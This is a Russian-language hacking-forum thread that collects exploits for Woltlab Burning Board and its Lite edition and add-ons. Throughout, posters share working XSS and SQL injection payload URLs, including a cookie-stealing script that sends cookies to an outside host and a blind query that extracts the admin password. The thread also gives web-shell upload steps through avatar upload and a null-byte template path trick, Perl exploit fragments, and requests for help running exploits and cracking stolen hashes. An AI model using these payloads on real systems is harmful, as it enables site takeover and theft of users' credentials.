![]() |
[Обзор уязвимостей Woltlab Burning Board + Lite]
Burning Board 2.0 \ 2.0.1 \ 2.0.2
XSS Wiw.php сценарий не достаточно фильтрует данные, представленные пользователем в sortby и order параметрах. Уязвимость может использоваться для доступа к куки пользователя wBB форума. Пример: Код:
/board/wiw.php?sid=&order=%22%3E%3Cscript%20type= %22text/javascript%22%3Eal ert(document.cookie);%3C/script%3E%3Cb%20%22sql инъекция Из за недостаточного сканирования параметров, обрабатываемых сценарием board.php, атакующий может внедрить произвольный SQL код в существующий SQL запрос. Уязвимость позволяет атакующему модифицировать данные в базе данных, выполнять произвольные команды и получать привилегии администратора BBS. Пример: Код:
board.php?boardid=[boardid]%27,%20userid=%27[victims userid, 1 is usually an admin]&sid=[attackers session-id]Burning Board 2.х sql инъекция Уязвимость существует в функции verify_email() при обработке входных данных формы в переменной $email. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример: Код:
sre464hfrgt6@4g546ufgfrh5.org' OR (userid=1 AND MID(password,1,1)='a')/*XSS при регистрации в полях: Код:
usernameBurning Board 2.3.1 и более ранние версии XSS Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей. Уязвимость существует в сценарии 'thread.php' из-за некорректной обработки входных данных в параметре 'hilight'. Пример: Код:
/thread.php?threadid=[TOPIC_ID]&hilight=[XSS]sql инъекция Пример: Код:
/modcp.php?action=post_del&x='SQ L_CODE_HEREXSS Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных в сценарии "acp/lib/class_db_mysql.php". пример: Код:
/wbb/xx.php?<script>location.href='http://yoursite.com/xss.php? cook='+escape(document.cookie)</script>XSS Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных в вложениях. Удаленный пользователь может с помощью специально сформированного изображения (GIF файл с расширением .jpg) выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Burning Board 2.3.6 sql инъекция Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием search.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. 3 сплоита под это дело: PHP код:
Код:
#!/usr/bin/perlКод:
#!/usr/bin/perl |
Lite версии Burning Board Lite 1.0.2(последняя на данный момент lite версия) XSS при регистрации в полях: Код:
usernameBurning Board Lite 1.0.2 XSS если разегистрироваться и указать в качестве ника "><script>alert(99)</script> то при входе в аккаунт скрипт будет срабатывать - xss. Burning Board Lite 1.0.2 доступ в директорию /acp/lib/ свободен(/acp - админка, и туда - тока с пассом) а там лежит файл config.php \\// также в админке присутствуют xss решил что не стоит про них писать... но если комуто интересно... я напишу. Burning Board Lite 1.0.2pl3e sql инъекция Уязвимость существует из-за недостаточной обработки входных данных в параметре "pmid[0]" в сценарии pms.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Для успешной эксплуатации требуется валидная учетная запись пользователя и чтобы приложение было запущено на MySQL 4.1 или выше. Burning Board Lite 1.0.2pl2e sql инъекция Уязвимость существует из-за недостаточной обработки входных данных в параметре "threadvisit" в файле куки. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. уязвимости модулей: Database 2.5 (модуль для Woltlab Burning Board) sql инъекция Уязвимость существует при обработке входных данных в параметрах fileid и subkatid в сценарии info_db.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Пример: Код:
/info_db.php?action=file&fileid=[SQL-Injection]заливаем шелл: Burning Board Lite 1.0.2 заливаем шелл: в админке жмём Add Avatar далее заливаем наш шелл, расширение php пропускает. шелл будет находиться по адресу: Код:
/images/avatars/avatar-shell.php(при имени шелла shell.php) |
alex155, есть вероятность того, что у каждой версии форума есть свои файлы, т.е в более новой версии могут быть файлы, которых нету в более старой версии, по наличию/отсутствию таких файлов можно определить версию.
|
Раскрытие префикса БД
wbb 2.3.4 /forum/thread.php?threadid=37&page=-2 Код:
SQL-DATABASE ERROR |
Спасибо автору за информацию! Я выдрал с помощью сплоита хэш, но что с ним теперь делать? Все программы говорят, что алгоритм не Md 5 кто может подсказать как мне его расшифровать?
Сначала думал что это сессия, НО он (кукис) неизменен. Значит это как то связанно с паролем. Курил исходники но так и не понял что почем. |
алгоритм sha1 попробуй.
|
Woltlab Burning Board Lite 1.0.2pl3e SQL-inj
PHP код:
|
Цитата:
|
Woltlab Burning Board 2.3.6 PL2 Remote Delete Thread XSRF Vulnerability
XSRF Vulnerability
Vulnerable: Woltlab Burning Board 2.3.6 PL2 Код HTML:
<html> |
WoltLab Burning Board 3.0.3 PL1 SQL Injection Vulnerability
Vulnerable: WoltLab Burning Board 3.0.3 PLX WoltLab Burning Board 3.0.2 PLX WoltLab Burning Board 3.0.1 PLX WoltLab Burning Board 3.0.0 PLX PoC: Код:
http://site.tld/wbb3/index.php?page=PMList&folderID=0&pageNo=1&sortFi |
Woltlab Burning Board Addon JGS-Treffen SQL Injection Vulnerability
Woltlab Burning Board Addon JGS-Treffen SQL Injection Vulnerability
Код:
###################### |
начал использовать сплойт для версии 2.3.6
Код:
#!/usr/bin/perlна первом скрине пишет что типа всё нормально, на втором тупо не может приконнектится. может быть я команды неправильные ввожу? http://ipicture.ru/uploads/080725/thumbs/zwO1kgQMd6.png http://ipicture.ru/uploads/080725/thumbs/X34xu05of7.png Помогите? |
вот второй использую -
Код:
#!/usr/bin/perlhttp://ipicture.ru/uploads/080725/thumbs/XRiSlpoT5U.png |
а какие есть способы определить версию этого форума?
|
Народ подскажите что с этим багом можно сделать??
Fatal error: PHP notice in file /var/www/forum-holywar-de/board/wcf_de/lib/system/template/Template.class.php(412) : eval()'d code (3): Undefined index: RELATIVE_WCF_DIR Information: error message: PHP notice in file /var/www/forum-holywar-de/board/wcf_de/lib/system/template/Template.class.php(412) : eval()'d code (3): Undefined index: RELATIVE_WCF_DIR error code: 0 file: /var/www/forum-holywar-de/board/wcf_de/lib/system/WCF.class.php (281) php version: 5.2.9 wcf version: 1.1.0 (Tempest) date: Fri, 15 Jan 2010 07:55:48 +0000 request: /board/wbb_en/index.php?page=Help referer: http://forum.holy-war.de/board/wbb_en/index.php?page=/etc/passwd Stacktrace: #0 /var/www/forum-holywar-de/board/wcf_de/lib/system/template/Template.class.php(412) : eval()'d code(3): WCF::handleError(8, 'Undefined index...', '/var/www/forum-...', 3, Array) #1 /var/www/forum-holywar-de/board/wcf_de/lib/system/template/Template.class.php(412): eval() #2 /var/www/forum-holywar-de/board/wcf_de/lib/system/language/Language.class.php(210): Template->fetchString('<ul>??<li>???<h...') #3 /var/www/forum-holywar-de/board/wcf_de/lib/data/help/HelpItem.class.php(40): Language->getDynamicVariable('wcf.help.item.m...') #4 /var/www/forum-holywar-de/board/wcf_de/templates/compiled/6_1_12_help.php(109): HelpItem->getExcerpt() #5 /var/www/forum-holywar-de/board/wcf_de/lib/system/template/Template.class.php(267): include('/var/www/forum-...') #6 /var/www/forum-holywar-de/board/wcf_de/lib/page/AbstractPage.class.php(100): Template->display('help') #7 /var/www/forum-holywar-de/board/wcf_de/lib/page/HelpPage.class.php(246): AbstractPage->show() #8 /var/www/forum-holywar-de/board/wcf_de/lib/page/AbstractPage.class.php(46): HelpPage->show() #9 /var/www/forum-holywar-de/board/wcf_de/lib/util/RequestHandler.class.php(64): AbstractPage->__construct() #10 /var/www/forum-holywar-de/board/wcf_de/lib/util/RequestHandler.class.php(92): RequestHandler->__construct('Help', Array, 'page') #11 /var/www/forum-holywar-de/board/wbb_en/index.php(8): RequestHandler::handle(Array) #12 {main} |
Версия: 3.1.0 PL1, возможно другие.
Раскрытие путей: 1) http://site/path/index.php?form=NewPassword&action=new&u=1&k[]= 2) http://site/path/index.php?form=UserLogin&s[]= Эти параметры уязвимы и вызывают раскрытие и в других местах. Активная xss: Создаём тему\пост, в нём картинку: [img]javascript:alert(document.cookie)[/img] Далее нужно любого юзера\модератора\администр атора заставить отредактировать\цитировать ваш пост. Тут требуется немного СИ, но в целом - не сложно. Нажав копку "edit" он увидит алерт со своими печеньками. Проверенно работает в Opera и IE в FF не сработало. Фича: Возможность проспамить\зафлудить e-mail любого пользователя, нету ограничений на отправку. http://site/path/index.php?form=Mail&userID=1 Выполнение произвольного кода и недокументированная возможность редактирования стандартных тем: Требуются права админа. Итак, логинимся под админом, переходим Design -> Templates -> Add new template pack Там вбиваем: Template pack name - "/" Template pack folder name - "/" (без кавычек) Далее переходим в List Templates и выбираем наш "/". Нажимаем "Add new template". Вбиваем: Template source code - любой php код, напимер шелл. Template name например shell.php А теперь внимание - финт ушами. Нам понадобиться FireFox и его дополнение Tamper Data: Включаем перехват, нажимаем в форме "Submit" и в Tamper Data правим параметр "templateName" заменяя его значение на что-то вроде Код:
../shell.php%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AA%00AAВот и всё, шелл залит. Да, и файлы - перезаписываются. Пока тестил случайно удалил index.php. Так-то. К слову, если вместо shell.php писать просто index, то мы перезапишем стандартный шаблон, что является не документированным и по умолчанию запрещённым. ps. возможно, будет дополняться. |
| Время: 22:36 |